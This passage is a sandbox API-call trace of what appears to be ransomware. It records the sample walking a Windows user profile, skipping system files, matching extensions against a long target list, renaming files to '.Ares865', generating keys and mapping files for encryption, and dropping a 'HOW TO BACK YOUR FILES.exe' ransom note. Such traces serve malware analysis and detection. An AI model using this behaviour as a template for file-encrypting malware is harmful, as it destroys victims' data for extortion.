[0065.411] lstrlenW (lpString="trc") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.411] lstrlenW (lpString="trm") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0065.411] lstrlenW (lpString="udb") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0065.411] lstrlenW (lpString="udl") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0065.411] lstrlenW (lpString="usr") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0065.411] lstrlenW (lpString="v12") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0065.411] lstrlenW (lpString="vis") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0065.411] lstrlenW (lpString="vpd") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0065.411] lstrlenW (lpString="vvv") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0065.411] lstrlenW (lpString="wdb") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0065.411] lstrlenW (lpString="wmdb") returned 4 [0065.411] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0065.411] lstrlenW (lpString="wrk") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0065.411] lstrlenW (lpString="xdb") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0065.411] lstrlenW (lpString="xld") returned 3 [0065.411] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0065.411] lstrlenW (lpString="xmlff") returned 5 [0065.411] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0065.411] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.Ares865") returned 87 [0065.411] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0065.413] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.414] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0065.414] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.414] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.414] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.414] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.415] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.415] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.415] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x118 [0065.417] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x190000 [0065.417] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.418] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.418] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d32b0 [0065.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d32b0 | out: hHeap=0x2b0000) returned 1 [0065.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.418] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0065.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0065.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.419] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.419] CloseHandle (hObject=0x118) returned 1 [0065.419] CloseHandle (hObject=0x164) returned 1 [0065.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.419] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.419] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfedc214c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="aoldtz.exe") returned 1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2=".") returned 1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="..") returned 1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="windows") returned -1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="bootmgr") returned 1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="temp") returned -1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="pagefile.sys") returned -1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="boot") returned 1 [0065.419] lstrcmpiW (lpString1="fwlink[1]", lpString2="ids.txt") returned -1 [0065.420] lstrcmpiW (lpString1="fwlink[1]", lpString2="ntuser.dat") returned -1 [0065.420] lstrcmpiW (lpString1="fwlink[1]", lpString2="perflogs") returned -1 [0065.420] lstrcmpiW (lpString1="fwlink[1]", lpString2="MSBuild") returned -1 [0065.420] lstrlenW (lpString="fwlink[1]") returned 9 [0065.420] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\desktop.ini") returned 79 [0065.420] lstrcpyW (in: lpString1=0x2cce488, lpString2="fwlink[1]" | out: lpString1="fwlink[1]") returned="fwlink[1]" [0065.420] lstrlenW (lpString="fwlink[1]") returned 9 [0065.420] lstrlenW (lpString="Ares865") returned 7 [0065.420] lstrcmpiW (lpString1="link[1]", lpString2="Ares865") returned 1 [0065.420] lstrlenW (lpString=".dll") returned 4 [0065.420] lstrcmpiW (lpString1="fwlink[1]", lpString2=".dll") returned 1 [0065.420] lstrlenW (lpString=".lnk") returned 4 [0065.420] lstrcmpiW (lpString1="fwlink[1]", lpString2=".lnk") returned 1 [0065.420] lstrlenW (lpString=".ini") returned 4 [0065.420] lstrcmpiW (lpString1="fwlink[1]", lpString2=".ini") returned 1 [0065.420] lstrlenW (lpString=".sys") returned 4 [0065.420] lstrcmpiW (lpString1="fwlink[1]", lpString2=".sys") returned 1 [0065.420] lstrlenW (lpString="fwlink[1]") returned 9 [0065.420] lstrlenW (lpString="bak") returned 3 [0065.420] lstrcmpiW (lpString1="[1]", lpString2="bak") returned -1 [0065.420] lstrlenW (lpString="ba_") returned 3 [0065.420] lstrcmpiW (lpString1="[1]", lpString2="ba_") returned -1 [0065.420] lstrlenW (lpString="dbb") returned 3 [0065.420] lstrcmpiW (lpString1="[1]", lpString2="dbb") returned -1 [0065.420] lstrlenW (lpString="vmdk") returned 4 [0065.420] lstrcmpiW (lpString1="k[1]", lpString2="vmdk") returned -1 [0065.420] lstrlenW (lpString="rar") returned 3 [0065.420] lstrcmpiW (lpString1="[1]", lpString2="rar") returned -1 [0065.420] lstrlenW (lpString="zip") returned 3 [0065.420] lstrcmpiW (lpString1="[1]", lpString2="zip") returned -1 [0065.420] lstrlenW (lpString="tgz") returned 3 [0065.420] lstrcmpiW (lpString1="[1]", lpString2="tgz") returned -1 [0065.420] lstrlenW (lpString="vbox") returned 4 [0065.420] lstrcmpiW (lpString1="k[1]", lpString2="vbox") returned -1 [0065.420] lstrlenW (lpString="vdi") returned 3 [0065.420] lstrcmpiW (lpString1="[1]", lpString2="vdi") returned -1 [0065.420] lstrlenW (lpString="vhd") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="vhd") returned -1 [0065.421] lstrlenW (lpString="vhdx") returned 4 [0065.421] lstrcmpiW (lpString1="k[1]", lpString2="vhdx") returned -1 [0065.421] lstrlenW (lpString="avhd") returned 4 [0065.421] lstrcmpiW (lpString1="k[1]", lpString2="avhd") returned 1 [0065.421] lstrlenW (lpString="db") returned 2 [0065.421] lstrcmpiW (lpString1="1]", lpString2="db") returned -1 [0065.421] lstrlenW (lpString="db2") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="db2") returned -1 [0065.421] lstrlenW (lpString="db3") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="db3") returned -1 [0065.421] lstrlenW (lpString="dbf") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="dbf") returned -1 [0065.421] lstrlenW (lpString="mdf") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="mdf") returned -1 [0065.421] lstrlenW (lpString="mdb") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="mdb") returned -1 [0065.421] lstrlenW (lpString="sql") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="sql") returned -1 [0065.421] lstrlenW (lpString="sqlite") returned 6 [0065.421] lstrcmpiW (lpString1="ink[1]", lpString2="sqlite") returned -1 [0065.421] lstrlenW (lpString="sqlite3") returned 7 [0065.421] lstrcmpiW (lpString1="link[1]", lpString2="sqlite3") returned -1 [0065.421] lstrlenW (lpString="sqlitedb") returned 8 [0065.421] lstrcmpiW (lpString1="wlink[1]", lpString2="sqlitedb") returned 1 [0065.421] lstrlenW (lpString="xml") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="xml") returned -1 [0065.421] lstrlenW (lpString="$er") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="$er") returned 1 [0065.421] lstrlenW (lpString="4dd") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="4dd") returned -1 [0065.421] lstrlenW (lpString="4dl") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="4dl") returned -1 [0065.421] lstrlenW (lpString="^^^") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="^^^") returned -1 [0065.421] lstrlenW (lpString="abs") returned 3 [0065.421] lstrcmpiW (lpString1="[1]", lpString2="abs") returned -1 [0065.421] lstrlenW (lpString="abx") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="abx") returned -1 [0065.422] lstrlenW (lpString="accdb") returned 5 [0065.422] lstrcmpiW (lpString1="nk[1]", lpString2="accdb") returned 1 [0065.422] lstrlenW (lpString="accdc") returned 5 [0065.422] lstrcmpiW (lpString1="nk[1]", lpString2="accdc") returned 1 [0065.422] lstrlenW (lpString="accde") returned 5 [0065.422] lstrcmpiW (lpString1="nk[1]", lpString2="accde") returned 1 [0065.422] lstrlenW (lpString="accdr") returned 5 [0065.422] lstrcmpiW (lpString1="nk[1]", lpString2="accdr") returned 1 [0065.422] lstrlenW (lpString="accdt") returned 5 [0065.422] lstrcmpiW (lpString1="nk[1]", lpString2="accdt") returned 1 [0065.422] lstrlenW (lpString="accdw") returned 5 [0065.422] lstrcmpiW (lpString1="nk[1]", lpString2="accdw") returned 1 [0065.422] lstrlenW (lpString="accft") returned 5 [0065.422] lstrcmpiW (lpString1="nk[1]", lpString2="accft") returned 1 [0065.422] lstrlenW (lpString="adb") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="adb") returned -1 [0065.422] lstrlenW (lpString="adb") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="adb") returned -1 [0065.422] lstrlenW (lpString="ade") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="ade") returned -1 [0065.422] lstrlenW (lpString="adf") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="adf") returned -1 [0065.422] lstrlenW (lpString="adn") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="adn") returned -1 [0065.422] lstrlenW (lpString="adp") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="adp") returned -1 [0065.422] lstrlenW (lpString="alf") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="alf") returned -1 [0065.422] lstrlenW (lpString="ask") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="ask") returned -1 [0065.422] lstrlenW (lpString="btr") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="btr") returned -1 [0065.422] lstrlenW (lpString="cat") returned 3 [0065.422] lstrcmpiW (lpString1="[1]", lpString2="cat") returned -1 [0065.422] lstrlenW (lpString="cdb") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="cdb") returned -1 [0065.423] lstrlenW (lpString="ckp") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="ckp") returned -1 [0065.423] lstrlenW (lpString="cma") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="cma") returned -1 [0065.423] lstrlenW (lpString="cpd") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="cpd") returned -1 [0065.423] lstrlenW (lpString="dacpac") returned 6 [0065.423] lstrcmpiW (lpString1="ink[1]", lpString2="dacpac") returned 1 [0065.423] lstrlenW (lpString="dad") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="dad") returned -1 [0065.423] lstrlenW (lpString="dadiagrams") returned 10 [0065.423] lstrlenW (lpString="daschema") returned 8 [0065.423] lstrcmpiW (lpString1="wlink[1]", lpString2="daschema") returned 1 [0065.423] lstrlenW (lpString="db-journal") returned 10 [0065.423] lstrlenW (lpString="db-shm") returned 6 [0065.423] lstrcmpiW (lpString1="ink[1]", lpString2="db-shm") returned 1 [0065.423] lstrlenW (lpString="db-wal") returned 6 [0065.423] lstrcmpiW (lpString1="ink[1]", lpString2="db-wal") returned 1 [0065.423] lstrlenW (lpString="dbc") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="dbc") returned -1 [0065.423] lstrlenW (lpString="dbs") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="dbs") returned -1 [0065.423] lstrlenW (lpString="dbt") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="dbt") returned -1 [0065.423] lstrlenW (lpString="dbv") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="dbv") returned -1 [0065.423] lstrlenW (lpString="dbx") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="dbx") returned -1 [0065.423] lstrlenW (lpString="dcb") returned 3 [0065.423] lstrcmpiW (lpString1="[1]", lpString2="dcb") returned -1 [0065.424] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].Ares865") returned 85 [0065.424] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1]" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1]"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].ares865"), dwFlags=0x1) returned 1 [0065.424] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds Cache\\1NBUR4HR\\fwlink[1].Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds cache\\1nbur4hr\\fwlink[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.424] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0065.425] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0065.425] CloseHandle (hObject=0x0) returned 0 [0065.425] CloseHandle (hObject=0x164) returned 1 [0065.425] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac2c9c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.425] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.425] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac2c9c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0065.425] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.425] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0065.425] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds" [0065.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0065.425] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds") returned 52 [0065.425] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds" [0065.425] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.425] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.426] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.426] GetLastError () returned 0x0 [0065.426] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.426] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.426] CloseHandle (hObject=0x12c) returned 1 [0065.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.426] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.426] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.426] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.426] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.426] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.426] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.426] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.426] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.426] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.426] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.426] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff107f92, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0065.426] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="aoldtz.exe") returned 1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".") returned 1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="..") returned 1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="windows") returned -1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="bootmgr") returned 1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="temp") returned -1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="pagefile.sys") returned -1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="boot") returned 1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="ids.txt") returned -1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="ntuser.dat") returned -1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="perflogs") returned -1 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2="MSBuild") returned -1 [0065.427] lstrlenW (lpString="FeedsStore.feedsdb-ms") returned 21 [0065.427] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\*") returned 54 [0065.427] lstrcpyW (in: lpString1=0x2cce46a, lpString2="FeedsStore.feedsdb-ms" | out: lpString1="FeedsStore.feedsdb-ms") returned="FeedsStore.feedsdb-ms" [0065.427] lstrlenW (lpString="FeedsStore.feedsdb-ms") returned 21 [0065.427] lstrlenW (lpString="Ares865") returned 7 [0065.427] lstrcmpiW (lpString1="dsdb-ms", lpString2="Ares865") returned 1 [0065.427] lstrlenW (lpString=".dll") returned 4 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".dll") returned 1 [0065.427] lstrlenW (lpString=".lnk") returned 4 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".lnk") returned 1 [0065.427] lstrlenW (lpString=".ini") returned 4 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".ini") returned 1 [0065.427] lstrlenW (lpString=".sys") returned 4 [0065.427] lstrcmpiW (lpString1="FeedsStore.feedsdb-ms", lpString2=".sys") returned 1 [0065.427] lstrlenW (lpString="FeedsStore.feedsdb-ms") returned 21 [0065.427] lstrlenW (lpString="bak") returned 3 [0065.427] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0065.427] lstrlenW (lpString="ba_") returned 3 [0065.427] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0065.427] lstrlenW (lpString="dbb") returned 3 [0065.427] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0065.427] lstrlenW (lpString="vmdk") returned 4 [0065.428] lstrcmpiW (lpString1="b-ms", lpString2="vmdk") returned -1 [0065.428] lstrlenW (lpString="rar") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0065.428] lstrlenW (lpString="zip") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0065.428] lstrlenW (lpString="tgz") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0065.428] lstrlenW (lpString="vbox") returned 4 [0065.428] lstrcmpiW (lpString1="b-ms", lpString2="vbox") returned -1 [0065.428] lstrlenW (lpString="vdi") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0065.428] lstrlenW (lpString="vhd") returned 3 [0065.428] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0065.428] lstrlenW (lpString="vhdx") returned 4 